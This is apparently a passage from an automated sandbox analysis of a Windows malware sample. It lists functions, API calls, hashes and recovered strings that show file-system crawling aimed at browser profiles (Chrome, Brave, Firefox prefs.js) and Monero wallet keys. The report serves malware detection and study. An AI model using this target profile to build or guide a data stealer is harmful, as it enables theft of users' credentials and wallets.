                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: c148296dd892aa0834fa160f2a403ac6a8e8e367c96ab89ef5379d02429a2908
                            • Instruction ID: 14a95d33fc1cdbe412d1b94676a77ee435034df5c945a51f58e74288c67763e2
                            • Opcode Fuzzy Hash: c148296dd892aa0834fa160f2a403ac6a8e8e367c96ab89ef5379d02429a2908
                            • Instruction Fuzzy Hash: E3F0E271641208BBEB249AA8AC49FFAB7ECE705B15F300448F604E3280D5B19E00DAA4
                            Function 000E1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000F78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000F7910
                              • Part of subcall function 000F78E0: RtlAllocateHeap.NTDLL(00000000), ref: 000F7917
                              • Part of subcall function 000F78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 000F792F
                              • Part of subcall function 000F7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000E11B7), ref: 000F7880
                              • Part of subcall function 000F7850: RtlAllocateHeap.NTDLL(00000000), ref: 000F7887
                              • Part of subcall function 000F7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 000F789F
                            • ExitProcess.KERNEL32 ref: 000E11C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: 521816a6d1bab9bb605234ebda7c6bb5bc011396e4d1e9f84b1e0c44d6519041
                            • Instruction ID: fc7fa26bd9e49c04df7afa3a0c3dd55ef2cdb286548bb24b276c833414e387f4
                            • Opcode Fuzzy Hash: 521816a6d1bab9bb605234ebda7c6bb5bc011396e4d1e9f84b1e0c44d6519041
                            • Instruction Fuzzy Hash: 33E012B595430957DE1477F5AC0ABBA329C9B14785F080428FB09D2603FE25E81296AB

                            Non-executed Functions

                            Function 000F38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 000F38CC
                            • FindFirstFileA.KERNEL32(?,?), ref: 000F38E3
                            • lstrcat.KERNEL32(?,?), ref: 000F3935
                            • StrCmpCA.SHLWAPI(?,00100F70), ref: 000F3947
                            • StrCmpCA.SHLWAPI(?,00100F74), ref: 000F395D
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000F3C67
                            • FindClose.KERNEL32(000000FF), ref: 000F3C7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: d116d0201fab0fda5484e0bab7b3aa91411a1ff24630fc4934dbbf270ddf4dcc
                            • Instruction ID: 660a5f761b2b36d323c140c700b72e301b6bd9d5de5ceecccbd4005e467cb58b
                            • Opcode Fuzzy Hash: d116d0201fab0fda5484e0bab7b3aa91411a1ff24630fc4934dbbf270ddf4dcc
                            • Instruction Fuzzy Hash: B8A13EB2A002189BDB75EBA4DC85FFE737CBB48300F04458CA60D96541EB749B85DFA2
                            Function 000EBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000FA920: lstrcpy.KERNEL32(00000000,?), ref: 000FA972
                              • Part of subcall function 000FA920: lstrcat.KERNEL32(00000000), ref: 000FA982
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                            • FindFirstFileA.KERNEL32(00000000,?,00100B32,00100B2B,00000000,?,?,?,001013F4,00100B2A), ref: 000EBEF5
                            • StrCmpCA.SHLWAPI(?,001013F8), ref: 000EBF4D
                            • StrCmpCA.SHLWAPI(?,001013FC), ref: 000EBF63
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000EC7BF
                            • FindClose.KERNEL32(000000FF), ref: 000EC7D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-726946144
                            • Opcode ID: 65cfae44e58077784771d35530f82ace844e2b8b77e1abcc6cdbccece1840996
                            • Instruction ID: 0eabb1077a90b302b06afe44d2d9e67c442c60df8b59a7cded4ef40ba5100a69
                            • Opcode Fuzzy Hash: 65cfae44e58077784771d35530f82ace844e2b8b77e1abcc6cdbccece1840996
                            • Instruction Fuzzy Hash: 71426AB26001089BDB14FB70DC56EFD737DAF85300F408558F60AA6592EF74AB4ADB92
                            Function 000F4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 000F492C
                            • FindFirstFileA.KERNEL32(?,?), ref: 000F4943
                            • StrCmpCA.SHLWAPI(?,00100FDC), ref: 000F4971
                            • StrCmpCA.SHLWAPI(?,00100FE0), ref: 000F4987
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000F4B7D
                            • FindClose.KERNEL32(000000FF), ref: 000F4B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 775039d63768db040adda53d0798f5ee96c12dfd8bdaae2f78b8c5eed8491dab
                            • Instruction ID: 654bab895d9f21aa5edc7b1313c4f88cd291fd62691a60be5190ff42dd2c4b2f
                            • Opcode Fuzzy Hash: 775039d63768db040adda53d0798f5ee96c12dfd8bdaae2f78b8c5eed8491dab
                            • Instruction Fuzzy Hash: B26152B2900619ABCB31EBA0DC45FFA73BCBB48701F04858CF64996141EB75AB85DF91
                            Function 000F4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000F4580
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000F4587
                            • wsprintfA.USER32 ref: 000F45A6
                            • FindFirstFileA.KERNEL32(?,?), ref: 000F45BD
                            • StrCmpCA.SHLWAPI(?,00100FC4), ref: 000F45EB
                            • StrCmpCA.SHLWAPI(?,00100FC8), ref: 000F4601
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000F468B
                            • FindClose.KERNEL32(000000FF), ref: 000F46A0
                            • lstrcat.KERNEL32(?,0122E758), ref: 000F46C5
                            • lstrcat.KERNEL32(?,0122D600), ref: 000F46D8
                            • lstrlen.KERNEL32(?), ref: 000F46E5
                            • lstrlen.KERNEL32(?), ref: 000F46F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 1e793696d273c50139710073e72641ac997f7519674af6027e2fb6e936d4e704
                            • Instruction ID: 299657d3a17b8991b0f5d187c636dbaa746424c78ac512f7a232d38dabf12f61
                            • Opcode Fuzzy Hash: 1e793696d273c50139710073e72641ac997f7519674af6027e2fb6e936d4e704
                            • Instruction Fuzzy Hash: A45162B290061C9BCB61EBB0DC89FFE777CAB58700F40459CF60992191EB749B859F92
                            Function 000F3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 000F3EC3
                            • FindFirstFileA.KERNEL32(?,?), ref: 000F3EDA
                            • StrCmpCA.SHLWAPI(?,00100FAC), ref: 000F3F08
                            • StrCmpCA.SHLWAPI(?,00100FB0), ref: 000F3F1E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000F406C
                            • FindClose.KERNEL32(000000FF), ref: 000F4081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: 6c7b2cd8d2e6f7a3a40d15e8343e844e28ac0c2f61591ae347efcfb2b39acd83
                            • Instruction ID: b31eab12a267495896d43e13b93319506f94a72efa80079d4646323a24fd4819
                            • Opcode Fuzzy Hash: 6c7b2cd8d2e6f7a3a40d15e8343e844e28ac0c2f61591ae347efcfb2b39acd83
                            • Instruction Fuzzy Hash: 815164B6904618ABCB25EBB0DC85EFA737CBB48300F04858CF75992081DB75EB869F51
                            Function 000EED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 000EED3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 000EED55
                            • StrCmpCA.SHLWAPI(?,00101538), ref: 000EEDAB
                            • StrCmpCA.SHLWAPI(?,0010153C), ref: 000EEDC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000EF2AE
                            • FindClose.KERNEL32(000000FF), ref: 000EF2C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: f67735373224391c6ac449dbf87f82b364c6d1f02ad37add7263b3f326e2cd73
                            • Instruction ID: ec18782e4c15b3e0397427e0909687b13148c71ac2b0f4b2dc6bde1d3398afbd
                            • Opcode Fuzzy Hash: f67735373224391c6ac449dbf87f82b364c6d1f02ad37add7263b3f326e2cd73
                            • Instruction Fuzzy Hash: F6E110B1A1111CAADB54FB60DC52EFE7338AF55340F4041A9B60E62493EF706B8ADF52
                            Function 000EF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000FA920: lstrcpy.KERNEL32(00000000,?), ref: 000FA972
                              • Part of subcall function 000FA920: lstrcat.KERNEL32(00000000), ref: 000FA982
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001015B8,00100D96), ref: 000EF71E
                            • StrCmpCA.SHLWAPI(?,001015BC), ref: 000EF76F
                            • StrCmpCA.SHLWAPI(?,001015C0), ref: 000EF785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000EFAB1
                            • FindClose.KERNEL32(000000FF), ref: 000EFAC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: 317dbc986220f72a564fceb116264c0dece7bfcd2152026ebd1db6dc462a57dd
                            • Instruction ID: 89ca07834610ff57dc0972c89a738b03ca1030e8464928ccc9a39b819cc7b1cb
                            • Opcode Fuzzy Hash: 317dbc986220f72a564fceb116264c0dece7bfcd2152026ebd1db6dc462a57dd
                            • Instruction Fuzzy Hash: 88B154B1A0020D9FCB24FF60DC55EFD7379AF55300F4081A8A50E96592EF746B4ADB92
                            Function 000E16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0010510C,?,?,?,001051B4,?,?,00000000,?,00000000), ref: 000E1923
                            • StrCmpCA.SHLWAPI(?,0010525C), ref: 000E1973
                            • StrCmpCA.SHLWAPI(?,00105304), ref: 000E1989
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000E1D40
                            • DeleteFileA.KERNEL32(00000000), ref: 000E1DCA
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000E1E20
                            • FindClose.KERNEL32(000000FF), ref: 000E1E32
                              • Part of subcall function 000FA920: lstrcpy.KERNEL32(00000000,?), ref: 000FA972
                              • Part of subcall function 000FA920: lstrcat.KERNEL32(00000000), ref: 000FA982
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
